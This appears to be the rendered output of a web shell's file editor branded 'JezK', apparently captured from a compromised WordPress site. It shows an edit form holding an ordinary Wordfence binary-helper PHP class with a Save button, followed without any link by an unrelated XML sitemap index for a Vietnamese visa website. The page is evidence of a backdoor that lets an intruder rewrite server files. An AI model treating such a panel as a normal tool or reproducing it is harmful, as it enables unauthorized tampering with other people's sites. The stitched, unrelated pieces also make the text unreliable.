
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: wfHelperBin.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

class wfHelperBin {

	/**
	 * @param string $bin1
	 * @param string $bin2
	 * @return mixed
	 */
	public static function addbin2bin($bin1, $bin2) {
		if (strlen($bin1) % 4 != 0) {
			$bin1 = str_repeat(&quot;\0&quot;, 4 - (strlen($bin1) % 4)) . $bin1;
		}
		if (strlen($bin2) % 4 != 0) {
			$bin2 = str_repeat(&quot;\0&quot;, 4 - (strlen($bin2) % 4)) . $bin2;
		}

		$bin1_ints = array_reverse(array_values(unpack('N*', $bin1)));
		$bin2_ints = array_reverse(array_values(unpack('N*', $bin2)));
		$return = array();
		$carries = 0;
		for ($i=0; $i &lt; max(count($bin1_ints), count($bin2_ints)); $i++) {
			$int1 = array_key_exists($i, $bin1_ints) ? $bin1_ints[$i] : 0;
			$int2 = array_key_exists($i, $bin2_ints) ? $bin2_ints[$i] : 0;
			$val = $int1 + $int2 + $carries;
			if ($carries &gt; 0) {
				$carries = 0;
			}
			if ($val &gt;= 0x100000000) {
				$val -= 0x100000000;
				$carries++;
			}
			$return[] = $val;
		}
		if ($carries) {
			$return[] += $carries;
		}
		$return = array_reverse($return);
		array_unshift($return, 'N*');
		$return = call_user_func_array('pack', $return);
		$return = ltrim($return, &quot;\x00&quot;);
		return strlen($return) == 0 ? &quot;\x00&quot; : $return;
	}

	/**
	 * Convert binary string to the 10101's representation.
	 *
	 * @param string $string
	 * @return string
	 */
	public static function bin2str($string) {
		$return = '';
		for ($i = 0; $i &lt; strlen($string); $i++) {
			$return .= str_pad(decbin(ord($string[$i])), 8, '0', STR_PAD_LEFT);
		}
		$return = ltrim($return, '0');
		return strlen($return) == 0 ? '0' : $return;
	}

	/**
	 * Convert 10101's representation back to the binary data.
	 *
	 * @param string $string
	 * @return string
	 */
	public static function str2bin($string) {
		if (strlen($string) % 32 &gt; 0) {
			$string = str_repeat('0', 32 - (strlen($string) % 32)) . $string;
		}
		$ints = str_split($string, 32);
		$return = '';
		foreach ($ints as $int) {
			$return .= pack('N', bindec($int));
		}
		$return = ltrim($return, &quot;\0&quot;);
		return strlen($return) == 0 ? &quot;\0&quot; : $return;
	}
}</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//visaglobal.com.vn/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap1.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap2.xml</loc>
		<lastmod>2026-08-27T04:35:16+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap3.xml</loc>
		<lastmod>2026-08-27T04:24:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/page-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/category-sitemap.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/video-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->